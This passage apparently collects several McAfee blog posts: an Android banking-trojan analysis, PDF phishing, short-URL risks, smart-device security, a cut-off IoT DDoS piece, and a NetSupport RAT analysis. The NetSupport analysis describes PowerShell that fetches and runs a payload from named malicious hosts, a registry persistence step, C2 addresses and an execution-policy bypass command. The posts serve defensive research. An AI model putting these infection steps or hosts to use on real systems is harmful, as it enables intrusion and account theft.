    • CVV number
    • atm pin
  • The main package goes by the name of hello.uwer.hello.hello.google.is.the.best, which contains the MainActivity for APK: The First oncreate function prompts for SMS read permission from the user, and when the user gives the permission, the user is greeted with the message “thank you -Team SBI” else “We can’t verify until you allow -Team Bank”

  • The read message permission is required to monitor any incoming messages, preferably OTPs, so those can be forwarded to the attacker to gain access to the account, bypassing any OTP-based 2-factor authentications.
  • All incoming messages are saved to the database and later forwarded to the attacker.
  • The Firebase configuration is stored in the APK along with the API key.
  • Debit/credit card information is being submitted using Firebase.
  • The user’s Aadhar number, CIF (customer information file), and user information are collected and submitted to Firebase.

Telemetry And Safety by Mcafee

  • McAfee Mobile Security proactively protects against this threat as Android/Banker.AXF!ML.
  • McAfee has prevented over 360 device infections of Android/Banker.AXF!ML in the last 30 days. India underscores the acute threat posed by this banking malware within the country’s digital landscape, with few hits found elsewhere in the world, possibly from Indian SBI users Living in Other Countries.

Android/Banker.AXF!ML infections around the world: India is the target.

  • The proactive stance taken by McAfee against Android/Banker.AXF!ML underscores its commitment to shielding users from the ever-evolving landscape of Android-based phishing and banking threats, emphasizing the importance of robust cybersecurity measures in safeguarding the integrity of personal financial data.

Conclusion

Banking trojans are not new or sophisticated but they are a persistent threat due to the lucrative business that poses for malware authors which can lure many victims that are unaware of the risk of phishing. As these campaigns can be massive even if a small percentage of targeted victims fall the criminals can have a large loot.

Cybercriminals are constantly improving their social engineering tricks to lure users into phishing and malware. The first line of defense against these threats is the user’s awareness. Some generic advises are:

  • Avoid installing apps from third party sources, especially apps received by messaging apps.
    • Do not activate “install unknown apps” option on social media apps.
  • Do not trust or click on messages received from untrusted sources in social media.
  • For banking apps stick into the official website and officials’ apps stores
  • If possible, use a reliable antivirus solution such as McAfee Mobile Security which generically protects against these types of threats.

McAfee Antivirus emerges as a formidable ally in the battle against Android phishing within India’s banking sector. With its robust suite of security features tailored for mobile devices, McAfee stands as a bulwark, providing critical defense mechanisms against the ever-mutating landscape of cyber threats.

Indicators Of compromise

Hash Package
7cfc6360e69d22b09a28c940caf628959d11176e27b8a03e15b020b369569415 hello.uwer.hello.hello.google.is.the.best
b067f5903e23288842ad056d4b31299b3b30052abe69bee236136b2b9fcab6a8 hello.uwer.hello.hello.google.is.the.best
e2e097ef433be75dcab830baa4b08feb4a24267c46b568fd4aef00dbb081ed8f hello.uwer.hello.hello.google.is.the.best
9f046f769760d52a97680a91fd511f1e86c428b9eec27d7eb486b7b4d0666f0b hello.uwer.hello.hello.google.is.the.best
1c69b0a69ed1631a1f1b54627a9b5dac3b214a275280de36d05ee75021cbfb04 hello.uwer.hello.hello.google.is.the.best
495ab4efd3d1ec9bfc2d08d80df316aad20dc76e625374627fabea06f5151584 hello.uwer.hello.hello.google.is.the.best
6190144b56e06af8aeeeba2104a665a555d01f6ec2a22ba78212d943ac2b258d hello.uwer.hello.hello.google.is.the.best
6c6ea9fbeae967fb53ab9984edda9b754fb6d3f85b4ff5b14e1fd33399362ba4 hello.uwer.hello.hello.google.is.the.best

 

Abused Firebase host : Wss[:]//s-usc1a-nss-2003.firebaseio.com/.ws?v=5&ns=zero-a4c52-default-rtdb

 

The post Shielding Against Android Phishing in Indian Banking appeared first on McAfee Blog.

PDF Phishing: Beyond the Bait

4 December 2023 at 15:52

By Lakshya Mathur & Yashvi Shah 

Phishing attackers aim to deceive individuals into revealing sensitive information for financial gain, credential theft, corporate network access, and spreading malware. This method often involves social engineering tactics, exploiting psychological factors to manipulate victims into compromising actions that can have profound consequences for personal and organizational security.

Over the last four months, McAfee Labs has observed a rising trend in the utilization of PDF documents for conducting a succession of phishing campaigns. These PDFs were delivered as email attachments.

Attackers favor using PDFs for phishing due to the file format’s widespread trustworthiness. PDFs, commonly seen as legitimate documents, provide a versatile platform for embedding malicious links, content, or exploits. By leveraging social engineering and exploiting the familiarity users have with PDF attachments, attackers increase the likelihood of successful phishing campaigns. Additionally, PDFs offer a means to bypass email filters that may focus on detecting threats in other file formats.

The observed phishing campaigns using PDFs were diverse, abusing various brands such as Amazon and Apple. Attackers often impersonate well-known and trusted entities, increasing the chances of luring users into interacting with the malicious content. Additionally, we will delve into distinct types of URLs utilized by attackers. By understanding the themes and URL patterns, readers can enhance their awareness and better recognize potential phishing attempts.

 Figure 1 – PDF Phishing Geo Heatmap showing McAfee customers targeted in last 1 month

Different Themes of Phishing

Attackers employ a range of corporate themes in their social engineering tactics to entice victims into clicking on phishing links. Notable brands such as Amazon, Apple, Netflix, and PayPal, among others, are often mimicked. The PDFs are carefully crafted to induce a sense of urgency in the victim’s mind, utilizing phrases like “your account needs to be updated” or “your ID has expired.” These tactics aim to manipulate individuals into taking prompt action, contributing to the success of the phishing campaigns.

Below are some of the examples:

Figure 2 – Fake Amazon PDF Phish

Figure 3 – Fake Apple PDF Phish

Figure 4 – Fake Internal Revenue Service PDF Phish

Figure 5 – Fake Adobe PDF Phish

Below are the stats on the volume of various themes we have seen in these phishing campaigns.

Figure 6 – Different themed campaign stats based on McAfee customers hits in last 1 month

Abuse of LinkedIn and Google links

Cyber attackers are exploiting the popular professional networking platform LinkedIn and leveraging Google Apps Script to redirect users to phishing websites. Let us examine each method of abuse individually.

In the case of LinkedIn, attackers are utilizing smart links to circumvent Anti-Virus and other security measures. Smart links are integral to the LinkedIn Sales Navigator service, designed for tracking and marketing business accounts.

Figure 7 – LinkedIn Smart link redirecting to an external website

By employing these smart links, attackers redirect their victims to phishing pages. This strategic approach allows them to bypass traditional protection measures, as the use of LinkedIn as a referrer adds an element of legitimacy, making it more challenging for security systems to detect and block malicious activity.

In addition to exploiting LinkedIn, attackers are leveraging the functionality of Google Apps Script to redirect users to phishing pages. Google Apps Script serves as a JavaScript-based development platform used for creating web applications and various other functionalities. Attackers embed malicious or phishing code within this platform, and when victims access the associated URLs, it triggers the display of phishing or malicious pages.

Figure 8 – Amazon fake page displayed on accessing Google script URL

As shown in Figure 8, when victims click on the “Continue” button, they are subsequently redirected to a phishing website.

Summary

Crafting highly convincing PDFs mimicking legitimate companies has become effortlessly achievable for attackers. These meticulously engineered PDFs create a sense of urgency through skillful social engineering, prompting unsuspecting customers to click on embedded phishing links. Upon taking the bait, individuals are redirected to deceptive phishing websites, where attackers request sensitive information. This sophisticated tactic is deployed on a global scale, with these convincing PDFs distributed to thousands of customers worldwide. Specifically, we highlighted the increasing use of PDFs in phishing campaigns over the past four months, with attackers adopting diverse themes such as Amazon and Apple to exploit user trust. Notably, phishing tactics extend to popular platforms like LinkedIn, where attackers leverage smart links to redirect victims to phishing pages, evading traditional security measures. Additionally, Google Apps Script is exploited for its JavaScript-based functionality, allowing attackers to embed malicious code and direct users to deceptive websites.

Remediation

Protecting oneself from phishing requires a combination of awareness, caution, and security practices. Here are some key steps to help safeguard against phishing:

  • Be Skeptical: Exercise caution when receiving unsolicited emails, messages, or social media requests, especially those with urgent or alarming content.
  • Verify Sender Identity: Before clicking on any links or providing information, verify the legitimacy of the sender. Check email addresses, domain names, and contact details for any inconsistencies.
  • Avoid Clicking on Suspicious Links: Hover over links to preview the actual URL before clicking. Be wary of shortened URLs, and if in doubt, verify the link’s authenticity directly with the sender or through official channels.
  • Use Two-Factor Authentication (2FA): Enable 2FA whenever possible. This adds an extra layer of security by requiring a second form of verification, such as a code sent to your mobile device.

McAfee provides coverage against a broad spectrum of active phishing campaigns, offering protection through features such as real-time scanning and URL filtering. While it enhances security against various phishing attempts, users must remain vigilant and adopt responsible online practices along with using McAfee.

The post PDF Phishing: Beyond the Bait appeared first on McAfee Blog.

Short-URL Services May Hide Threats

By: McAfee
25 October 2020 at 19:35

Short-URL services have emerged as a crucial part of the way we use the Internet. With the increasing use of social media, where the number of characters is limited, short-URL services are a useful tool for reducing a URL’s length. However, this convenience also comes with a potential risk. The anonymity provided by these services can serve as a breeding ground for online threats. This article delves deeper into the potential risks associated with using short-URL services and how you can safeguard yourself from these threats.

What are Short-URL Services?

Short-URL services are online tools that convert a long URL into a short one. These services are often free and easy to use: you simply enter the long URL you wish to shorten and the service will generate a short URL for you. This can be particularly handy for social media platforms such as Twitter, where character limits can make sharing long URLS impractical.

The short URL does not provide any clues about the destination website – it is a random mix of letters and numbers. This lack of transparency can make it difficult for users to determine the legitimacy of the link before clicking it. Consequently, this has opened a pandora’s box for cyber threats, as ill-intentioned individuals can hide malicious links behind these short URLs.

The Hidden Threats of Short-URL Services

While the brevity provided by short-URL services is a practical solution in the age of character-limited social media posts, it’s important to understand the accompanying risks. With the shortened URL, the original URL is hidden, which can make it challenging for users to discern whether the link is safe or not. This very feature is exploited by cybercriminals who mask malicious sites with short URLs, intending to trick users into visiting harmful web pages.

Phishing attacks, malware, and other types of online fraud can be hidden behind short URLs. Usually, these URLs are distributed via emails, social media, and instant messaging applications. Once clicked, these malicious links can infect a user’s device with malware or lead them to fake websites where sensitive information is collected. This manipulative tactic is known as ‘spoofing’.

Dig Deeper: New Malicious Clicker found in apps installed by 20M+ users

Increased Vulnerability with Short-URL Services

The practice of using short URLs has brought about an increased level of vulnerability in cyberspace. Certain security features that help in identifying a malicious website, such as examining the URL structure or the SSL certificate, are effectively nullified by the use of short URLs. As a result, even experienced internet users can fall prey to these malicious tactics. This marks a significant shift in traditional cybersecurity threats, where the danger is now hidden behind the veil of convenience.

Dig Deeper: “This Connection Is Not Private” – What it Means and How to Protect Your Privacy

Even more concerning is the fact that once a short URL is generated, it remains active indefinitely. This means a malicious link can continue to exist and pose a threat long after the original malicious activity has been detected and dealt with. Given the scale at which these short URLs are generated and shared across various digital platforms, the potential for harm is vast and hard to contain. 

The Role of URL Shortening Services in Cybercrime

Given the opacity provided by short-URL services, they have become a popular tool among cybercriminals. A report by the cybersecurity firm Symantec found that 87% of the malicious URLs used in massive cyber-attacks were actually short URLs. This stark statistic illustrates the size of the problem at hand and the urgent need for adequate measures to tackle it.

Short URLs are like a wolf in sheep’s clothing. They appear harmless, but the reality could be contrary. Without the ability to inspect the actual URL, users can unknowingly fall into a trap set by online fraudsters. The success of these threats relies heavily on the victim’s ignorance and the inability to determine the authenticity of the link they are clicking on. 

Case Studies of Cyber Threats Involving Short URLs

To fully comprehend the risks associated with short URLs, let’s examine a few real-life cases where short URLs were used to spread cyber threats. In one instance, a malicious short URL was used to propagate a Facebook scam that promised users a free gift card if they clicked on the link. Instead of a gift card, the link led users to a phishing site designed to steal personal information.

Dig Deeper: Don’t Take a Bite out of that Apple Gift Card Scam

In another instance, an email campaign used a short URL to spread the notorious Locky ransomware. The email contained an invoice with a short URL, which when clicked, downloaded the ransomware onto the user’s device. These two cases underscore the severe risks associated with short URLs and highlight the importance of exercising caution when dealing with such links.

How to Safeguard Against Threats Hidden in Short URLs

While the threats presented by short URLs are real and potentially damaging, internet users are not entirely helpless against them. There are certain measures that can be taken to avoid falling victim to these threats. Below are some of the ways to ensure safe browsing habits:

Firstly, be wary of any strange or unexpected links, even if they come from trusted sources. Cybercriminals often disguise malicious links to appear as though they are from trusted sources, in a tactic known as ‘spoofing’. However, if an email or a message seems out of character or too good to be true, it’s best to avoid clicking on the link.

Secondly, consider using URL expansion services. These services allow you to enter a shortened URL and then reveal the full URL, enabling you to see where the link will take you before you click on it. This can provide an added layer of security when dealing with unfamiliar links.

Finally, keep your devices and internet security software up to date. This is a simple but effective measure against all forms of online threats, including those hidden in short URLs. By regularly updating your devices and software, you can ensure you have the most recent security patches and protections available.

McAfee Pro Tip: Enhance your online safety and privacy by employing a secure browser. A safe browser incorporates additional security features designed to thwart unauthorized third-party activities during your web surfing sessions. Know more about safe browsing.

Role of Institutions in Mitigating Threats

While individual users can take steps to protect themselves, institutions also have a role to play in mitigating the threats associated with short URLs. Social media platforms, email providers and companies should all be invested in protecting their users from cyber threats. Implementing stricter URL policies, improving spam filters, and educating users about potential dangers can all help in reducing the risk.

Internet service providers can also have a hand in safeguarding users. For instance, they could monitor and block suspicious short URLs, or provide warnings to users about potential threats. While these measures may not completely eliminate the risk, they can greatly reduce the chances of users falling victim to cyber threats.

Moreover, there’s a growing need for regulatory policies around the usage and creation of short URLs. Instituting thorough checks before a short URL is generated could help in curbing the misuse of these services. Such checks could include verifying the authenticity of the original URL and scanning for potential threats.

Final Thoughts

Short-URL services undeniably offer a degree of convenience in this age of Twitter-length posts and character-limited updates. However, the potential threats that lurk behind these shortened links cannot be overlooked. Users and institutions need to balance the benefits of these services with the risks, and take appropriate measures to safeguard against potential threats.

While we cannot completely eliminate the risks associated with short URLs, by staying informed, exercising caution, and using tools and resources at our disposal, we can significantly reduce our vulnerability to these threats. In the end, it’s about promoting a safer Internet experience for everyone, where convenience doesn’t come at the cost of security.

Stay informed about the latest online threats plaguing the community today. Explore the insights provided by McAfee to arm yourself with the knowledge needed to protect against evolving cybersecurity challenges.

The post Short-URL Services May Hide Threats appeared first on McAfee Blog.

Your Smart Coffee Maker is Brewing Up Trouble

By: McAfee
25 October 2020 at 09:10

Smart technology has been on the rise, with internet-connected devices becoming increasingly common in our homes. From smart speakers to smart fridges, these devices are designed to make our lives easier and more efficient. However, they also raise new concerns about privacy and security. One device that has been gaining popularity is the smart coffee maker. While it may seem harmless, there are potential risks associated with this seemingly innocuous device.

A smart coffee maker, like other smart appliances, connects to your home network, offering convenience features such as scheduling brew times, remote start, and customization of your coffee preferences. However, this connectivity also opens the door to potential cybersecurity threats. If not properly managed, your smart coffee maker could be brewing up more than just your morning pick-me-up.

The Dangers of Smart Coffee Makers

The central issue lies in the connectivity of these smart coffee makers. Just like your computer or smartphone, any device that connects to the internet can potentially be hacked. This may result in theft of personal information, disruption of your network, or even malicious use of the device itself. And while a hacked coffee maker might not seem like a big deal, it could be used as a gateway to access other, more sensitive devices on your network.

Many people may not even realize that their smart coffee maker poses a security risk. After all, it doesn’t store personal data like a phone or computer does. However, once it’s connected to your network, it becomes a potential entry point for hackers. And because it’s a relatively new type of device, it might not have the same level of security measures that more well-established smart devices have.

On Digital Privacy

Another serious concern with smart coffee makers and similar devices is privacy. Some smart appliances have microphones, cameras, or other sensors that can monitor your habits and collect data. This data can potentially be sold to advertisers or used for other less-than-ethical purposes.

→ Dig Deeper: What Personal Data Do Companies Track?

Even if your smart coffee maker doesn’t have these features, it still collects data about your coffee habits, such as when you usually make coffee and how much you make. This information, while not as sensitive as personal or financial data, could still be valuable to advertisers and other third parties.

On Hacking Attempts

While it might seem far-fetched, hackers can cause a lot of trouble with a compromised coffee maker. One obvious issue is simple annoyance or disruption. A hacker could, for example, repeatedly start the brew cycle at odd hours, wasting coffee and creating a mess. But the potential problems go beyond simple pranks.

A more serious concern is that a hacker could use the coffee maker as a stepping stone to infiltrate the rest of your network. This could potentially give them access to sensitive data stored on other devices, such as personal documents on your computer or personal information stored on your phone. In some cases, they could even take control of other smart devices connected to your network.

Possible Solutions and Security Measures

The good news is that there are steps you can take to secure your smart coffee maker and other connected devices:

  • Improve Password Security: The first step is to always change the default password. Most smart devices come with a default password, which is often something easy to guess, like “password” or “1234”. This makes it easy for hackers to gain control of the device, so changing the password to something unique and hard to guess is crucial.
  • Update the Device: Another good practice is to regularly update the device’s firmware. This is the software that runs on the device and controls its functions. Manufacturers often release firmware updates to fix security vulnerabilities, so keeping your device updated is important for maintaining its security.
  • Network Segmentation: Consider segmenting your home network to isolate IoT (Internet of Things) devices like smart coffee makers from other more sensitive devices. This helps contain potential security breaches and limits unauthorized access to critical information.
  • Use Strong Encryption: Ensure that your device and the accompanying mobile app use strong encryption protocols. This adds an extra layer of protection to the data transmitted between your device and the connected app, making it more challenging for cybercriminals to intercept and exploit.
  • Implement Two-Factor Authentication (2FA): Wherever possible, enable two-factor authentication for your smart device accounts. This adds an additional verification step, usually involving a code sent to your mobile device, providing an extra barrier against unauthorized access.
  • Vet Third-Party Apps: Be cautious when installing third-party apps that connect to your smart devices. Ensure they come from reputable sources, as malicious apps can compromise the security of both your device and the data it handles.

McAfee Pro Tip: Be cautious when downloading apps, especially third-party ones. Certain applications might contain malware or viruses that pose a threat to your device’s security.

  • Be Informed: It’s also a good idea to keep an eye on any news about security issues with the device. If a vulnerability is discovered, you want to know about it as soon as possible so you can take steps to fix it.

What Manufacturers Can Do

While consumers have a responsibility to use their devices securely, manufacturers also have a role to play in improving the security of smart appliances. They can, for instance, design devices with security in mind from the outset. This could involve using secure coding practices and running through security tests before releasing a product. Manufacturers can also provide timely updates and clear instructions on how to apply them.

Manufacturers should also be transparent about what data their devices collect and how it’s used. If a device collects data, the manufacturer should provide clear information about this in the product’s privacy policy. They should also give users the ability to opt out of data collection if they choose.

→ Dig Deeper: The Tradeoff Between Convenience and Security – A Balancing Act for Consumers and Manufacturers

Final Thoughts

Smart coffee makers, like all connected devices, come with potential security and privacy risks. However, the convenience and efficiencies they offer can make them an attractive addition to your home. With a combination of diligent security practices on the part of the user and responsible design and transparency from manufacturers, these risks can be managed.

Despite the potential issues, this doesn’t mean you should be afraid to use a smart coffee maker or other smart devices. Instead, be aware of the risks and take proactive steps to protect yourself and your data. Whether it’s changing the default password, regularly updating the firmware, or researching before buying, these simple steps can go a long way toward safeguarding your smart home. After all, a warm cup of coffee in the morning should be a comfort, not a cause for concern.

The post Your Smart Coffee Maker is Brewing Up Trouble appeared first on McAfee Blog.

Beneath the Surface: How Hackers Turn NetSupport Against Users

27 November 2023 at 16:31

NetSupport malware variants have been a persistent threat, demonstrating adaptability and evolving infection techniques. In this technical analysis, we delve into the infection chain, technical intricacies, and IOCs (Indicators of Compromise) of distinct NetSupport variants.

The following is a heatmap depicting the current prevalence of NetSupport in the field. This malware is spreading across the United States and Canada, signifying its geographical reach.

Figure 1 : NetSupport Heat Map

McAfee Labs recently identified a new variation of NetSupport malware, which was distributed through JavaScript, highlighting the evolving tactics employed by cybercriminals.

Infection Chain

  • The infection begins with obfuscated JavaScript files, serving as the initial point of entry for the malware.
  • Upon execution of the JavaScript file, it invokes the Windows Script Host (wscript.exe).
  • Subsequently, the wscript.exe process initiates PowerShell, employing specific commands to advance the infection.
  • Under the attacker’s control, PowerShell proceeds to download the NetSupport payload, a remote administration tool with malicious intent.
  • Once downloaded, the malware executes the ‘client32.exe’ binary, which is the NetSupport client responsible for establishing control over the compromised system.

Figure 2 : Infection Chain

Technical Analysis

Variant 1:

This Variant starts with a very long JS file. It follows an intricate infection chain, utilizing PowerShell commands. Key steps include changing the directory to the user’s AppData, setting variables, downloading files, and eventually executing ‘client32.exe’. This executable establishes control over the compromised system and registers for auto-startup through Windows Registry, following which the ‘client32.exe’ binary is placed in the ‘MsEdgeSandbox’ folder under AppData, providing persistence.

The JS code looks like as shown in the picture below. Attackers leverage obfuscated JavaScript files as the starting point of an infection chain. These files are designed to bypass security mechanisms and initiate the delivery of malicious payloads.

Figure 3: Encoded Java Script File

It contains a long list of string literals, each consisting of random characters and sequences of letters. These strings are typically used for various purposes in the code, such as constructing URLs, setting values for variables, or possibly for other purposes. The code defines several variables (hy, hY, hE, hi) and a function named ‘y’.

Figure 4 : Encoded Java Script File

  • Then it sets up different variables and objects and does some calculations or operations.

Figure 5 : Encoded Java Script File

  • The S function appears to decode a base64-encoded string and returns a decoded string. The R function takes two arguments, a decoded string, and another string (g). It uses a custom algorithm to perform XOR operations and returns the result.
  • The function appears to cache decoded values in the h array to avoid redundant decoding. If a decoded value is found in the cache, it is returned directly; otherwise, it is decoded using the Y[‘YUlcMP’] function and stored in the cache.

Figure 6 : Encoded Java Script File

  • It creates a Windows notification using “wscript”, and temp file in the temp directory.
  • Then it runs that file using shell and deletes the file after execution.

The script shown in the AMSI buffer dumps in Figure 7, begins by changing the directory to the user’s AppData folder. It then sets up variables and proceeds to download and execute files. If certain commands are unavailable, it uses ‘bitsadmin’ for file downloads. The script ensures persistence by altering directory attributes, launching ‘client32.exe,’ and adding a Windows registry entry for automatic execution.

Figure 7 : AMSI Dump

  • First, the script changes the current directory to the user’s AppData directory.
  • As shown in figure 8, it defines several variables, including URLs for downloading files, file paths, and commands to be executed.

Figure 8 : Code block

  • Then it checks whether the expand-archive command is available ($g3tSp4), and whether the Start-Bits Transfer command is available ($PsaB17). If both are available, it uses Start-BitsTransfer to download and transfer files, and then extracts them using expand-archive. If these commands are not available.

    Figure 9 : Code block

  • It downloads Client32.exe and other required dll and config files from https:[/][/]tukudewe[.]com[/]js[/]h3b2_jsg.

Figure 10 : Code block

  • Then it sets the attributes of a directory to ‘Hidden’, changes the current directory, starts the client32.exe executable, and adds an entry to the Windows Registry to execute the client32.exe file at startup (as shown in Figure 11).

Figure 11 : Code block

Variant 2:

Variant 2 of this malware shares a similar infection chain as Variant 1. Like Variant 1, it starts with obfuscated but different JavaScript files and subsequently invokes PowerShell. However, what sets Variant 2 apart is its distinct approach to manipulating files and content. It downloads a text file from a website, decodes base64-encoded data, and creates a ZIP file with potentially malicious content. Variant 2 differs significantly when it comes to file manipulation. Instead of placing the ‘client32.exe’ in the ‘MsEdgeSandbox’ folder like Variant 1, it follows an alternative path. In this case, it establishes the ‘client32.exe’ in a folder labeled ‘D’ under AppData. This distinct approach to file placement sets it apart from Variant 1, despite the shared initial infection chain.

The JS file as shown in Figure 12, includes two variables, ‘F4f’ and ‘EQGMUD.’ ‘F4f’ is set to a specific value, 140743580. ‘EQGMUD’ is a bit more complex; it’s a string formed by converting numerical values into characters. These values are derived by subtracting ‘F4f’ (140743580) from them. Finally, the ‘eval’ function is used to run the code stored in ‘EQGMUD’ as JavaScript, essentially executing this string as a script.

Figure 12 : Encoded Java Script File

The AMSI buffer dumps as shown in Figure 13, contains PowerShell commands that perform several actions, including downloading a file from the internet, extracting it, and making changes to the windows registry.

Figure 13 : AMSI Dump

  • hxxps://svirtual[.]sanviatorperu[.]edu[.]pe/readme[.]txt, this is a text file hosted on a website. It first downloads the content from this website and stores it in $6.
  • Then the script decodes the base64-encoded data stored in $6 and stores the result in $a, which is binary data.
  • Then it sets the variable $d to a path in the user’ “Application Data” directory with a subdirectory named ‘D’.
  • Then it checks whether the $d path exists, if it doesn’t, then it creates the path.
  • It constructs a path to a file named ‘p.zip’ inside the directory specified in $d and stores it in the variable $p.
  • Then it writes the binary data stored in $a to the file specified in $p. This essentially creates a ZIP file with potentially malicious contents.


Figure 14 : Directory Created

  • It attempts to extract the contents of zip file ‘$p’ into the directory specified in $d. A try/catch block, handles exceptions.
  • It constructs a path to an executable file named ‘client32.exe’ inside the directory specified in $d and stores it in the variable $e.
  • if (Test-Path $e -PathType Leaf) {Start-Process -FilePath $e} else {Write-Host ‘No exe.’ };: This section checks if the file specified in $e exists and is a valid executable file. If it is, it attempts to start the executable using Start-Process. Otherwise, it writes ‘No exe.’ to the console.
  • Then it constructs a path to ‘client32.exe’ inside the directory specified in $d and stores it in the variable $s.
  • It sets the variable $k to a Windows Registry key path used to add programs to run at user logon.

Process Tree

Figure 15 : Process Tree

Once the JavaScript file is executed, it launches wscript.exe and then launches PowerShell with the following command.

powershell.exe -ExecutionPolicy Bypass -V

Figure 16 : PowerShell Command

This way, PowerShell with the execution policy set to “Bypass”, which means that PowerShell will not enforce any execution restrictions. This allows scripts to run without any policy-related restrictions.

Persistence

This malware is known for its persistence and attempts to hide within the user’s profile directories, which makes it challenging to remove.

It creates a “MsEdgeSandbox” folder in AppData in the first variant and downloads the following files in that folder.

Figure 17 : Created Directory

Various installation paths were seen in different variants.

C:\Users\user\AppData\Roaming\Apple2q6lxy6v\client32.exe

C:\Users\user\AppData\Roaming\Apple2q6lxy6v\client32.exe

C:\Users\user\AppData\Roaming\Apple2abm1oct\client32.exe

C:\Users\user\AppData\Roaming\Apple2w35hfwm7\client32.exe

C:\Users\user>\AppData\Roaming\Apple2abm1oct\client32.exe

c:\users\user\appdata\roaming\apple2u8g65jb\client32.exe

C:\Users\user\AppData\Roaming\Apple22w3r7sx\client32.exe

C:\Users\user\AppData\Roaming\Apple2hnrvoo\client32.exe

C:\Users\user\AppData\Roaming\Apple2kvu25\client32.exe

C:\Users\user\AppData\Roaming\Apple25aoyh\client32.exe

C:\Users\user\AppData\Roaming\Apple2i262cp\client32.exe

C:\Users\user\AppData\Roaming\Apple2hnrvoo\client32.exe

C:\Users\user\AppData\Roaming\Apple2g057yi\client32.exe

C:\Users\user\AppData\Roaming\Apple22fu82\client32.exe

C:\Users\user\AppData\Roaming\Apple25aoyh\client32.exe

C:\Users\user\AppData\Roaming\Apple2kvu25\client32.exe

C:\Users\user\AppData\Roaming\Apple22fu82\client32.exe

C:\Users\user\AppData\Roaming\ Apple2_5frlv9\client32.exe

C:\Users\user\AppData\Roaming\ Apple2_y8yyxp\client32.exe

C:\Users\user\AppData\Roaming\ Apple2_v8qm4f\client32.exe

C:\Users\user\AppData\Roaming\ Apple2_y44ztr\client32.exe

C:\Users\user\AppData\Roaming\ Apple2_joafqo\client32.exe

C:\Users\user\AppData\Roaming\ Apple2_ncfy5n\client32.exe

C:\Users\user\AppData\Roaming\ Apple2_v8qm4f\client32.exe

C:\Users\user\AppData\Roaming\ Apple2_y44ztr\client32.exe

C:\Users\user\AppData\Roaming\ Apple2_y8yyxp\client32.exe

C:\Users\user\AppData\Roaming\ Apple2_ncfy5n\client32.exe

C:\Users\user\AppData\Roaming\ Apple2_joafqo\client32.exe

C:\Users\user\AppData\Roaming\ Apple2_5frlv9\client32.exe

C:\Users\user\AppData\Roaming\ Apple2_z8yde3x\client32.exe

C:\Users\user\AppData\Roaming\ Apple2_z8yde3x\client32.exe

C:\Users\user\AppData\Local\Temp\o2pi4q4o.i1y\client32.exe

c:\users\user \appdata\roaming\d\client32.exe

C:\Users\user\AppData\Roaming\D\client32.exe

client32

c:\users\user\appdata\roaming\d\client32.exe

C:\Program Files (x86)\NetSupport\NetSupport DNA\Client\dnarc.exe

c:\program files (x86)\netsupport\netsupport dna\client\dnarc.exe

 

Payload Overview

  • Client32.exe: This executable file is a component of NetSupport Manager Client, a widely used software solution for remote desktop management and support.
  • The folder contains various files, which is typical of software installations. These files include DLLs, EXEs, INIs, INFs, and LICs, each serving a specific purpose within the software.
  • NetSupport Manager Client is a commercially available software product that can be purchased or obtained through a free trial.
  • To confirm the authenticity of the software, a hash query was performed using the executable file’s hash value. The query was submitted to VT, the results of the VT query indicated that Client32.exe is legitimately signed, reaffirming its status as a genuine software component.

Figure 18 : File Signature

Client32.ini: This file contains the configuration settings for NetSupport Manager. It governs how NetSupport Manager interacts with managed hosts and allows operators to configure various options.

NSM.LIC: The LIC file contains license details related to the NetSupport Manager installation, which are essential for proper licensing and software activation.

  • The Client32.ini file provides operators with a range of configuration options. These options enable NetSupport Manager operators to manage remote hosts effectively or remain concealed when necessary.

Figure 19 : INI File

  • For this specific installation, the INI file indicates the presence of two NetSupport Manager console addresses:

jokosampbulid1.com:1412

Domain: jokosampbulid1.com

Port: 1412

  • Upon querying the domain “jokosampbulid1.com” on VirusTotal, it was identified as a C2 server associated with the NetSupport Manager RAT.

C2

  • Client32.exe establishes a communication channel with a remote server located at IP address 45.15.158.212 on port 1412.
  • The choice of port 1412 suggests that it may be a specific port designated for NetSupport Manager’s communication protocol.
  • 15.158.212
  • port: 1412

Figure 20 : C2 Communication

  • “NetSupport Manager/1.3” indicates that the communication originates from a NetSupport Manager Client with version 1.3.


Figure 21 : HXXP Stream

Conclusion: 

The analysis of NetSupport malware variants has revealed a persistent and continually evolving threat landscape. These variants employ intricate infection chains and technical intricacies to accomplish their malicious goals. Our investigation has provided insights into their modus operandi, including downloading, and executing files through obfuscated JavaScript code and altering the Windows Registry for persistence.

At McAfee Labs, our commitment is unwavering. We strive to provide robust and effective threat defense mechanisms to safeguard our users from a wide array of threats, including NetSupport and its various iterations. Our security software harnesses the power of signature-based, machine learning, threat intelligence, and behavior-based detection techniques, all working together to identify and thwart threats effectively. In an ever-changing digital landscape, our focus remains on keeping you safe and secure from emerging threats.

IOCs

Variant 1:

Type SHA256
JS 5ffb5e9942492f15460e58660dd121b31d4065a133a6f8461554ea8af5c407aa
EXE 89F0C8F170FE9EA28B1056517160E92E2D7D4E8AA81F4ED696932230413A6CE1
URL hxxp://45[.]15[.]158[.]212/fakeurl.htm

 

Variant 2:

Type SHA256
JS 48bc766326068e078cf258dea70d49dcce265e4e6dbf18f1a0ce28d310f6a89a

73e0975c94ebcdec46fd23664ccecf8953dd70eea1f4e5813e7f8cd8d2dbc4f9

URL hxxps://svirtual[.]sanviatorperu[.]edu[.]pe/readme.txt

 

The post Beneath the Surface: How Hackers Turn NetSupport Against Users appeared first on McAfee Blog.

Top 5 Things to Know About Recent IoT Attacks

2 November 2020 at 10:10

Recent Internet attacks have caused several popular sites to become unreachable. These include Twitter, Etsy, Spotify, Airbnb, Github, and The New York Times. These incidents have highlighted a new threat to online services: botnets powered by the Internet of Things (IoT). Distributed denial of service (DDoS) attacks have been around for over a decade and, for the most part, have been handled by network providers’ security services. However, the landscape is changing.

The primary strategy in these attacks is to control a number of devices which then simultaneously flood a destination with network requests. The target becomes overloaded and legitimate requests cannot be processed. Traditional network filters typically handle this by recognizing and blocking systems exhibiting this malicious behavior. However, when thousands of systems mount an attack, these traditional filters fail to differentiate between legitimate and malicious traffic, causing system availability to crumble.

Cybercriminals, Hacktivists, and IoT

Cybercriminals and hacktivists have found a new weapon in this war: the IoT. Billions of IoT devices exist, ranging in size from a piece of jewelry to a tractor. These devices all have one thing in common: they connect to the internet. While this connection offers tremendous benefits, such as allowing users to monitor their homes or check the contents of their refrigerators remotely, it also presents a significant risk. For hackers, each IoT device represents a potential recruit for their bot armies.

A recent attack against a major DNS provider shed light on this vulnerability. Botnets containing tens or hundreds of thousands of hijacked IoT devices have the potential to bring down significant sections of the internet. Over the coming months, we’ll likely discover just how formidable a threat these devices pose. For now, let’s dig into the key aspects of recent IoT DDoS attacks.

5 Key Points to Understand

